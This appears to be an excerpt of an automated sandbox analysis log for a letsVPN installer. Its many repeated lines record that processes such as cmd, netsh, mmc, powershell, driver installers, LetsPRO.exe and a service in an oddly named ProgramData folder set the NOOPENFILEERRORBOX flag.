              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\letsvpn-latest.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\letsvpn-latest.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
